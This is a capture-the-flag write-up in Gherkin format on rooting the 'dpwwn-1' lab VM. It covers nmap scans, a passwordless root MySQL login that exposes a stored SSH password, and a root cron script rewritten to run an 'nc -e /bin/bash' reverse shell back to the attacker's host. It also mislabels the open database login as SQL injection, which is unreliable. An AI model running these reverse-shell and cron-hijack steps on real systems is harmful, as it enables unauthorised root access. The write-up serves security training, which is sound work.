## Version 1.4.1
## language: en

Feature:
  TOE:
    dpwwn-1
  Category:
    SQL Injection
  Location:
    http://192.168.0.14:80/
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Restrict root permissions and assign a strong key for login to mySql server

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 09:25 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.081s latency).
    Nmap scan report for 192.168.0.4 (192.168.0.4)
    Host is up (0.19s latency).
    Nmap scan report for kali (192.168.0.11)
    Host is up (0.00081s latency).
    Nmap scan report for dpwwn-01 (192.168.0.14)
    Host is up (0.00044s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 19.15 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.14
    """
    $ sudo nmap -sV -sS 192.168.0.14
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 09:29 EST
    Nmap scan report for dpwwn-01 (192.168.0.14)
    Host is up (0.00068s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    3306/tcp open  mysql   MySQL 5.5.60-MariaDB
    MAC Address: 08:00:27:C8:C5:47 (Oracle VirtualBox virtual NIC)

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.14:80/
    And the Rashomon IPS homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given port 3306 is running a MySql server
    Then I proceed to log in as root user without password
    """
    mysql -u root -p -h 192.168.0.14
    Enter password:
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 4
    Server version: 5.5.60-MariaDB MariaDB Server

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input
    """
    Then I confirm that the server is vulnerable by SQL Injection

  Scenario: Exploitation
    Given the site is vulnerable to SQL Injection
    Then I ready the tables in search of vulnerable information
    """
    MariaDB [(none)]> show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | mysql              |
    | performance_schema |
    | ssh                |
    +--------------------+
    4 rows in set (0.337 sec)

    use ssh;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Database changed

    MariaDB [ssh]> show tables;
    +---------------+
    | Tables_in_ssh |
    +---------------+
    | users         |
    +---------------+
    1 row in set (0.010 sec)

    MariaDB [ssh]> select * from users;
    +----+----------+---------------------+
    | id | username | password            |
    +----+----------+---------------------+
    |  1 | mistic   | testP@$$swordmistic |
    +----+----------+---------------------+
    1 row in set (0.011 sec)
    """
    Given the password, authentication is performed on the system using SSH
    Then the files and permissions given for the mistic user are listed
    """
    [mistic@dpwwn-01 ~]$ id
    uid=1000(mistic) gid=1000(mistic) groups=1000(mistic)
    context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

    [mistic@dpwwn-01 ~]$ ls -la
    total 20
    drwx------. 2 mistic mistic 100 Aug  1  2019 .
    drwxr-xr-x. 3 root   root    20 Aug  1  2019 ..
    -rw-------. 1 mistic mistic   5 Dec 29 10:10 .bash_history
    -rw-r--r--. 1 mistic mistic  18 Oct 30  2018 .bash_logout
    -rw-r--r--. 1 mistic mistic 193 Oct 30  2018 .bash_profile
    -rw-r--r--. 1 mistic mistic 231 Oct 30  2018 .bashrc
    -rwx------. 1 mistic mistic 186 Aug  1  2019 logrot.sh

    [mistic@dpwwn-01 ~]$ cat logrot.sh
    #!/bin/bash
    #
    #LOGFILE="/var/tmp"
    #SEMAPHORE="/var/tmp.semaphore"


    while : ; do
      read line
      while [[ -f $SEMAPHORE ]]; do
        sleep 1s
      done
      printf "%s\n" "$line" >> $LOGFILE
    done
    """
    Given the current permissions it is necessary to escalate privileges
    Then I listed the executable files that are listed in the /etc/crontab path
    """
    [mistic@dpwwn-01 ~]$ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root

    # For details see man 4 crontabs

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed
    # |  |  |  |  |
    # *  *  *  *  * user-name  command to be executed

    */3 *  * * *  root  /home/mistic/logrot.sh
    """
    Then I watch the file logrot.sh run with root permissions
    And I modify the script to get a reverse shell
    """
    nano logrot.sh

    #!/bin/bash
    nc -e /bin/bash 192.168.0.11 1234 &
    """
    Then to use nc to listen to port 1234
    """
    nc -lvp 1234
    listening on [any] 1234 ...
    connect to [192.168.0.11] from dpwwn-01 [192.168.0.14] 54094
    id
    uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:
    system_cronjob_t:s0-s0:c0.c1023

    ls -al /root
    total 32
    dr-xr-x---.  2 root root  182 Aug  1  2019 .
    dr-xr-xr-x. 17 root root  211 Aug  1  2019 ..
    -rw-------.  1 root root 1394 Aug  1  2019 anaconda-ks.cfg
    -rw-------.  1 root root   14 Aug  1  2019 .bash_history
    -rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
    -rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
    -rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
    -rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
    -r-x------.  1 root root  171 Aug  1  2019 dpwwn-01-FLAG.txt
    -rw-------.  1 root root    0 Aug  1  2019 .mysql_history
    -rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
    ls
    anaconda-ks.cfg
    dpwwn-01-FLAG.txt
    cat dpwwn-01-FLAG.txt

    Congratulation! I knew you can pwn it as this very easy challenge.

    Thank you.


    64445777
    6e643634
    37303737
    37373665
    36347077
    776e6450
    4077246e
    33373336
    36359090
    """
    Given the new privileges on the root.txt
    Then the flag is read [evidences](03.png)

  Scenario: Remediation
    Given the sql injection vulnerability
    Then you must protect the login to the MySql server with a strong password
    And avoid root permissions to unnecessary files

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-29
